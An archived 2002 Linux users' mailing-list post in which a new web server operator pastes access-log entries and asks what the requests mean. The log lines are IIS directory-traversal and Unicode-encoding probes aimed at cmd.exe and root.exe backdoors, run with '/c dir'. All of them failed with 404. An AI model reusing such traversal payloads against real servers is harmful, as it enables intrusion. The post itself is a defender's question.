Subject: What are these people looking for ?..
From: blair parker (cmjvpp@corecom.net)
Date: Mon Dec 09 2002 - 14:36:49 AKST
Howdy.
I have recently started a web server, and I have noticed a LOT of folks hitting my server with requests for files that do not exist. Following is a little snippet from my 'access_log' file:
h00055d349d35.ne.client2.attbi.com - - [09/Dec/2002:12:48:10 -0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 318 "-" "-"
h00055d349d35.ne.client2.attbi.com - - [09/Dec/2002:12:48:11 -0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
h00055d349d35.ne.client2.attbi.com - - [09/Dec/2002:12:48:13 -0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
h00055d349d35.ne.client2.attbi.com - - [09/Dec/2002:12:48:15 -0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
h00055d349d35.ne.client2.attbi.com - - [09/Dec/2002:12:48:20 -0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
h00055d349d35.ne.client2.attbi.com - - [09/Dec/2002:12:48:25 -0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
h00055d349d35.ne.client2.attbi.com - - [09/Dec/2002:12:48:30 -0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
h00055d349d35.ne.client2.attbi.com - - [09/Dec/2002:12:48:32 -0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 373 "-" "-"
h00055d349d35.ne.client2.attbi.com - - [09/Dec/2002:12:48:38 -0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
I am assuming that these folks are up to no good, but does anyone know what they are attempting to do ?..
Thanks.
Blair Parker
---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.
This archive was generated by hypermail 2a23 : Mon Dec 09 2002 - 14:36:55 AKST